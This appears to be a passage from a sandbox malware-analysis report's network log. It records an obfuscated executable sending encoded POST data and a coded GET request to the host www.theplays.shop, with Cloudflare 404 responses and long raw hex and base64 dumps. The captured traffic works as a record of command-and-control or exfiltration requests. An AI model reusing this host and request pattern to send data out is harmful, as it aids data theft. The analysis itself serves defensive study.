                                          User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 33 72 49 64 4e 3d 50 48 6f 65 45 53 6c 53 62 5a 64 4c 6c 6f 32 53 73 4c 4b 35 43 51 5a 79 39 35 72 41 70 73 4c 58 2b 49 34 48 6c 35 59 55 72 55 53 52 35 45 2f 68 32 43 68 53 34 54 37 4b 41 69 43 6b 50 4c 74 70 69 39 33 7a 32 72 43 62 67 2b 6a 38 65 7a 68 36 2b 75 30 4a 33 36 57 35 4a 52 6a 6f 6f 53 48 6a 78 79 2f 47 70 55 71 47 31 63 77 79 4b 30 50 74 54 58 64 4f 76 41 78 44 72 75 6f 41 35 66 57 44 2f 67 6f 32 61 66 66 62 74 76 69 75 6e 6f 69 42 5a 6e 54 72 32 55 4a 32 43 4f 66 77 41 73 59 63 62 36 59 52 64 71 75 73 4d 48 6f 57 5a 65 48 5a 75 46 44 4d 58 57 54 6a 5a 38 5a 78 6e 6a 75 69 2b 70 2b 6c 70 48 44 38 53 4e 4d 59 6d 56 65 44 71 50 52 4a 59 65 39 55 2f 2b 50 65 6e 6d 4b 66 31 59 68 41 31 6d 6b 61 7a 4d 4a 2f 51 32 4d 50 71 48 41 6e 71 42 75 68 6d 61 69 74 73 65 58 35 2f 57 57 77 35 4b 78 4e 4d 42 4a 78 6f 66 34 59 68 78 53 78 66 75 37 64 6d 58 4f 62 64 46 6c 34 72 58 6f 6a 36 65 36 66 44 33 69 4e 51 64 6d 56 73 52 6b 52 71 34 38 4a 38 45 2f 73 66 42 59 61 4a 49 57 32 39 72 7a 2b 33 6e 73 4b 44 50 33 4a 4b 36 4c 69 62 58 68 69 58 58 2b 2b 34 39 69 72 67 64 49 77 44 54 61 62 73 54 65 42 77 77 6a 2f 4d 2b 38 47 37 79 53 6b 6c 54 44 47 2f 45 68 66 44 6f 48 6e 6c 38 64 45 5a 67 4b 2b 31 31 46 44 6c 6e 56 48 4c 4c 77 69 61 34 73 64 75 76 32 41 41 4e 79 76 76 39 61 2f 36 54 73 4d 71 59 7a 74 79 4d 6b 64 4a 76 33 64 58 51 79 78 6a 45 41 57 69 45 4f 35 74 47 6e 76 37 32 50 39 33 65 50 62 59 62 69 73 69 6c 39 4d 6d 4e 66 4a 64 69 7a 68 4f 6e 76 4d 43 77 61 65 59 33 37 33 6e 4f 6c 4b 45 58 63 62 55 37 50 5a 42 54 63 77 52 52 42 69 73 2b 50 75 6d 35 41 36 73 46 74 55 62 6c 4c 51 39 37 6e 69 36 45 33 69 59 4c 56 38 38 36 4e 62 44 6a 6c 79 43 36 4a 72 44 55 62 31 42 35 52 36 59 2b 56 4f 5a 47 56 68 6b 4b 32 51 4e 6d 2f 52 36 7a 4b 70 59 65 6c 45 38 31 4b 73 56 37 64 67 57 56 55 52 77 52 61 38 44 4d 42 65 2b 76 32 39 5a 70 4a 6e 6a 5a 38 75 48 59 36 78 41 62 6c 30 6d 7a 49 66 71 4e 54 69 71 59 62 5a 76 64 65 79 61 43 36 6c 5a 4c 32 46 58 62 6e 59 43 36 44 42 65 2f 46 5a 47 61 79 36 5a 6d 42 59 47 48 6c 6e 62 38 53 47 2f 44 78 55 4b 6b 54 37 39 77 39 52 62 71 2b 56 45 58 70 50 55 4c 67 2b 48 36 5a 58 65 61 75 53 41 73 6c 4f 2f 4c 66 67 6c 49 77 6a 59 4c 52 57 4a 42 70 39 36 34 6a 6d 75 63 78 34 55 2f 78 35 42 75 33 66 4d 6a 78 44 7a 54 75 33 51 52 54 36 30 61 4e 51 7a 41 49 2b 62 59 59 57 74 32 49 49 75 7a 4b 54 56 48 58 35 51 6a 2b 51 52 74 38 64 33 71 6f 2f 32 55 43 56 41 51 56 79 58 6c 59 55 4c 74 66 6c 46 47 75 53 6b 4a 54 34 6c 42 2b 69 44 64 6d 32 4d 56 66 6a 6d 65 4b 6c 58 61 32 56 37 72 6c 46 34 6b 35 48 38 43 7a 57 74 69 44 68 71 65 79 4c 2b 55 32 55 4a 51 4f 66 66 76 45 75 54 6b 33 43 42 73 62 41 6a 34 74 30 39 79 4e 4a 4e 43 68 65 4d 54 46 57 50 6a 33 70 49 5a 36 78 6d 31 4c 75 38 69 2b 45 4d 53 52 57 37 71 75 73 45 64 76 4a 42 42 77 49 31 52 46 6c 56 48 79 6d 4f 48 62 6b 47 6a 77 7a 34 42 31 45 78 59 48 64 4b 72 65 46 66 59 4c 46 30 67 50 6a 4a 30 38 62 71 67 6d 52 5a 39 48 46 53 37 6f 56 33 57 41 6b 33 70 77 51 47 56 30 71 4d 46 77 77 64 74 36 2f 56 71 6b 6a 6c 42 35 6f 39 68 38 31 4b 4c 4f 6d 4b 39 6a 4f 4a 5a 4e 37 78 44 48 59 41 4d 33 65 33 49 4b 46 46 6a 63 59 69 65 6f 6d 57 51 44 31 49 4c 56 6b 4a 59 68 62 5a 49 5a 76 4a 76 35 7a 50 77 44 30 5a 31 39 6c 48 6c 52 42 78 64 54 37 4b 69 5a 6e 67 66 34 6e 6f 6d 61 6d 4f 65 4a 31 6c 2b 73 61 77 41 58 46 58 69 39 6e 70 62 63 49 32 79 35 46 6c 77 62 58 56 51 49 49 6d 59 50 62 68 4f 68 4a 64 67 32 61 4f 55 4d 4d 6f 50 6e 78 7a 36 53 77 6d 73 6b 4f 6d 6f 39 6d 58 4f 48 41 78 6f 38 31 44 54 73 2b 43 32 7a 59 59 56 70 57 77 4e 54 4d 76 54 46 67 35 4e 31 69 4b 73 6f 58 79 4c 34 32 43 48 75 4e 6c 4e 4e 43 57 6a 52 62 33 43 46 54 48 2f 64 46 58 72 51 65 6a 73 62 48 67 69 6c 48 61 55 73 39 44 56 48 45 66 73 6e 34 61 4e 69 70 4f 76 7a 75 48 79 68 61 79 55 79 33 35 43 44 35 41 74 6a 33 74 49 71 4f 35 66 6c 76 43 73 31 78 36 59 76 36 46 6b 53 50 38 65 4c 6a 79 34 6a 6f 6d 6f 6c 30 6f 69 58 69 4c 6d 63 47 61 6a 6f 31 5a 5a 7a 2f 78 71 6a 49 4a 55 74 67 75 4e 74 54 64 76 32 6e 71 5a 49 74 38 76 61 50 6e 73 6e 6f 4f 37 66 31 62 41 52 67 42 58 64 79 44 32 47 36 39 73 2b 77 42
                                          Data Ascii: 3rIdN=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
                                          Apr 24, 2024 11:58:52.455466986 CEST2578OUTData Raw: 78 69 44 7a 63 72 2f 47 30 45 59 46 58 61 78 37 4a 2b 76 6e 55 32 78 4a 73 58 70 7a 79 4c 52 55 47 78 77 61 58 69 49 53 66 6c 46 2f 47 47 49 35 50 77 4a 35 44 44 6c 53 68 68 51 30 63 77 31 4e 32 2f 50 75 2f 34 74 76 44 32 37 66 68 53 39 4b 46 55
                                          Data Ascii: xiDzcr/G0EYFXax7J+vnU2xJsXpzyLRUGxwaXiISflF/GGI5PwJ5DDlShhQ0cw1N2/Pu/4tvD27fhS9KFUjX6f5yApazeqa1LFq26xt1fqv0o3E9Zch9G7Y2ESXZe+q1AaWnndiEj28bC2AG8Pn5IhMGADvmJesBibFBlPsThD+eCzZ2kSHO094UqMIxc1gFtWNyFxECllpKvV07+r+WWu5w+L8xm6whnC2o780hOfagtI/eQbI
                                          Apr 24, 2024 11:58:52.455596924 CEST2578OUTData Raw: 44 70 47 4b 66 43 6d 72 50 49 72 79 65 42 32 42 6a 47 4f 66 50 33 46 4e 52 66 62 70 4b 6e 50 76 70 32 48 49 45 65 76 72 49 6b 63 32 6b 63 36 37 38 79 56 77 64 2b 4d 4d 74 77 33 36 63 62 33 52 35 69 47 52 74 67 6b 6e 4c 37 46 61 6b 55 64 45 33 53
                                          Data Ascii: DpGKfCmrPIryeB2BjGOfP3FNRfbpKnPvp2HIEevrIkc2kc678yVwd+MMtw36cb3R5iGRtgknL7FakUdE3Sys2u46q/p2kiWblaiUA1Pqne0y8Y+aENadBkIPAo/Tg46CRxfQTsVlha142ueuAKmdPrD7H4xxlRziwD81xzDUWOsnqP8+UDMsdq3MkuhC58tngYoysOAK86rGAlTkf1Pg0B6/yWeWz8S3FyQZ6IavasdVZbXVCCH
                                          Apr 24, 2024 11:58:52.455780983 CEST12890OUTData Raw: 54 58 64 6a 31 70 54 52 33 4f 2b 49 35 32 46 57 6d 38 31 54 59 4b 57 64 53 74 6d 5a 35 47 6a 5a 43 73 54 76 6f 36 36 76 49 63 59 48 65 39 2b 38 72 4d 71 68 39 42 39 7a 45 71 72 49 69 51 6f 6b 45 72 61 50 76 65 6c 61 45 78 67 6a 38 45 2f 30 61 2b
                                          Data Ascii: TXdj1pTR3O+I52FWm81TYKWdStmZ5GjZCsTvo66vIcYHe9+8rMqh9B9zEqrIiQokEraPvelaExgj8E/0a+DA8Cs0O7iaeGTTqzuPKPwvBb1/f3vqGOOuIaodhCY78UE56huiV7nIu3fynP4B1dxjKT3gRoU2nlCnXpeDG2nhT/8CTw+APqBP133jDOeLEZPGoVbZVjxnXE4TMo3LR9PqBXdGQx9hp3hqevKntAToOQhWMfMygKN
                                          Apr 24, 2024 11:58:52.455938101 CEST2578OUTData Raw: 35 45 58 6b 62 65 73 56 37 33 31 7a 39 77 57 61 61 4e 58 43 36 42 59 71 33 6d 35 6b 30 67 34 57 56 51 4e 4e 70 42 61 73 4e 47 37 62 33 4f 73 57 6a 4a 73 6e 4a 38 44 49 61 6b 63 6d 78 31 73 41 64 68 46 56 6e 33 43 65 58 5a 37 31 64 72 67 37 4c 75
                                          Data Ascii: 5EXkbesV731z9wWaaNXC6BYq3m5k0g4WVQNNpBasNG7b3OsWjJsnJ8DIakcmx1sAdhFVn3CeXZ71drg7LuDZ6QuafaenbuR6Tg36vMMtw5w97sCJsQgurlDGe/6CYm1CNIO+FOUjH1Dlih01Me2m9equ4pNupNnL3xiN3zoTii9ZXFoeZFYFeFKjQYwrbqW0iFH8XVPgFEykfcTzDquatHc7UMLXMU/sJqexTBhuB0A96LHOCoH
                                          Apr 24, 2024 11:58:52.456106901 CEST5156OUTData Raw: 4f 36 75 54 56 35 34 4b 33 5a 68 55 6e 6c 31 4b 67 70 65 55 68 6f 53 79 56 79 58 45 71 2b 67 31 4d 78 4f 30 51 68 33 39 2f 2b 2f 4d 61 73 79 49 49 39 71 46 47 2f 6b 6c 69 35 4a 78 69 70 44 45 37 2b 50 39 57 6d 66 56 57 6f 34 48 75 46 42 76 4a 30
                                          Data Ascii: O6uTV54K3ZhUnl1KgpeUhoSyVyXEq+g1MxO0Qh39/+/MasyII9qFG/kli5JxipDE7+P9WmfVWo4HuFBvJ0urv1wv54S/ClKd3VJrCMn4qdh3abs3lq8b3b24dk4jzFoDAc1HEj0JrqPfGaQ55d+vEyP4otiQxS0WNdsTFRPKgqvDHP07CSkzycv7k14DavQal/wOn+zycwIOuChhHDRJvFfIogdh/MDc7LMPH8Z3GmUk1okHRL8
                                          Apr 24, 2024 11:58:52.615705967 CEST2578OUTData Raw: 52 44 4c 74 6c 43 32 56 63 66 4c 6e 35 4d 58 73 6f 5a 6c 4d 41 74 6d 32 73 52 31 56 74 47 6c 6d 79 53 43 4b 68 39 64 55 55 4c 61 4c 6b 68 51 6e 53 56 62 45 59 65 61 48 32 70 70 6f 49 39 2f 77 65 30 78 2b 63 6a 38 65 57 43 4e 48 52 63 42 45 75 61
                                          Data Ascii: RDLtlC2VcfLn5MXsoZlMAtm2sR1VtGlmySCKh9dUULaLkhQnSVbEYeaH2ppoI9/we0x+cj8eWCNHRcBEuax67FsVWSMncst7qptFwRxo7/F3pZYs8sUZW3/mWLCTBTbYeVyoxYxGQGG64J4tNlmvb+Q4UiCHjJx70i0j78kPBLt18JeySQwyzIiRkGR/Rdh7E26VIitdOyMguifw0bPPEhTKprmfhLGMtCzr3k6Z40Ly97p6wTh
                                          Apr 24, 2024 11:58:52.615861893 CEST2578OUTData Raw: 62 67 38 73 37 50 32 38 49 52 57 2f 2f 64 46 33 46 78 32 6e 41 57 76 34 58 6a 4f 76 49 2f 71 31 37 6a 66 4d 62 69 36 67 37 57 62 35 75 41 64 74 36 63 56 36 68 68 61 6e 61 69 65 6b 54 34 76 49 41 6f 70 34 65 75 61 42 76 4a 53 33 74 37 2f 52 6e 4f
                                          Data Ascii: bg8s7P28IRW//dF3Fx2nAWv4XjOvI/q17jfMbi6g7Wb5uAdt6cV6hhanaiekT4vIAop4euaBvJS3t7/RnOTHWKINlGAq8VLzytmN7GcRnckrh9GJisV+1faZgQ2CQlyJHky7WGt/BOAe1xwNOvYgZgFdFTTgcydBS0SgOtFJaNBvxhizSsbVPfpte9i2dIWNSQOCxaYK6XWSYJjUANnq3k0JB/O1VHhA5qBIK+duSbd7QpVqEOY
                                          Apr 24, 2024 11:58:52.616036892 CEST6445OUTData Raw: 53 61 58 4a 6f 57 35 36 58 31 52 39 33 65 74 38 73 70 6a 2f 35 6b 70 56 75 63 47 35 36 51 46 6b 61 31 69 2f 76 32 50 30 49 36 5a 78 72 33 5a 76 43 6b 69 6b 64 4d 33 57 53 7a 61 35 4b 75 6c 75 53 52 5a 64 78 57 68 64 36 67 39 57 59 36 5a 50 37 34
                                          Data Ascii: SaXJoW56X1R93et8spj/5kpVucG56QFka1i/v2P0I6Zxr3ZvCkikdM3WSza5KuluSRZdxWhd6g9WY6ZP74FzJ536cMK2OtTX2BiN2fnn7MaO5xg8FZfpXP+XV8iluloVrDkTXG84UlVbYWBKsfkEiolRDkqbonKmXVeWb5Ya4yG4MihvQqZE3u1DiMORT9quCGnwkwC0vA9TiAHH5FaWXK8013jzSfnuyWIRvzzmQQ9d4yumpxh
                                          Apr 24, 2024 11:58:52.616235018 CEST3251OUTData Raw: 56 6a 73 68 48 31 4f 49 69 51 4e 46 6a 46 51 58 63 39 51 32 6d 38 55 61 46 7a 37 79 2b 6f 39 48 56 79 48 71 65 41 49 53 48 73 30 7a 50 5a 6c 4b 50 63 76 46 6a 52 42 67 48 77 2f 46 65 54 79 59 4d 73 67 61 74 48 2f 65 65 6c 4e 6f 72 6f 36 31 53 56
                                          Data Ascii: VjshH1OIiQNFjFQXc9Q2m8UaFz7y+o9HVyHqeAISHs0zPZlKPcvFjRBgHw/FeTyYMsgatH/eelNoro61SVGQ/1NLHjas53OMTVbBMiH8wesBmRM0bHR0KXOo9T2TGkpC+HlmsvAugus4qHuzkJ2HdDgGL2MLpFesntc7I94tKh/UiSRSUfOZuPtmCAfBFsaj6mkBR0ARWdUWKkXeAM4WknD3GSm772B0lPCwnwdaiGMMalGqYTv
                                          Apr 24, 2024 11:58:53.086810112 CEST1119INHTTP/1.1 404 Not Found
                                          Date: Wed, 24 Apr 2024 09:58:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MKm88EOSbBkRGmcQUNXninC3PDBZMRCMC5b6X%2FEK8wQMVzTXO%2FKi7RcoHGs2T3mXp6u43Pf1sU67%2BSmQPqEocS9eOHsmTtjGqHlOtWlSzF4Mh6ObNIpWtsDPNUmVuf7VLLAkTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 87953cc15d922a9f-LAX
                                          Content-Encoding: gzip
                                          alt-svc: h3=":443"; ma=86400
                                          Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a
                                          Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
                                          Apr 24, 2024 11:58:53.400208950 CEST1289INData Raw: 37 66 66 61 0d 0a 24 5a c7 ce c4 3c 8e 7c 97 bd 7a 01 e7 34 b3 73 90 73 ce b1 6f ce d9 ee 76 b6 9f 7e f1 fd 73 15 08 09 92 c8 2a b2 c8 7f ce fa bf 3f 6f d9 d6 e2 3f ff 53 66 7b f6 af 6e ca 9a 0a fe ce cd bf f3 6c ab 28 e2 7f bb 88 b3 bd 0b d1 e5
                                          Data Ascii: 7ffa$Z<|z4ssov~s*?o?Sf{nl(f[1li)3#WAE0^40R'nZ$TBNaMIW::f[.x"+h+$&)4QRI+'ZP["L]My@6w6`|


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.11.2050322172.67.152.117807072C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe
                                          TimestampBytes transferredDirectionData
                                          Apr 24, 2024 11:58:54.980178118 CEST534OUTGET /gnbc/?3rIdN=CFA+HkVxdb5EmOTiyKzJRx18y6HwiaTX//sAjaoe71zU1jru2C8H4zLuCGW9CrkOmabuxLOltM6mSwZ40cUW36eaDQ/OtyT9g3qPq0qmgtUTW0WFBiYRpF0=&-vl=m8zDpnb8Q0wTDj9 HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-US,en
                                          Connection: close
                                          Host: www.theplays.shop
                                          User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Apr 24, 2024 11:58:55.456274033 CEST1289INHTTP/1.1 404 Not Found
                                          Date: Wed, 24 Apr 2024 09:58:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6mqhCtYPhcKQolffdsxmhPbRVJaIKjXqt6QNl2nfZpoLlD3eGaDWhLygLclMHX0j0rdKRbH65GREoodHcUVyIjeJIodHYTOg8rW%2BExA7WilKJRAG37fMoMOi%2Fo9zw89zYrDjxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 87953cd219a52f7c-LAX
                                          alt-svc: h3=":443"; ma=86400
                                          Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 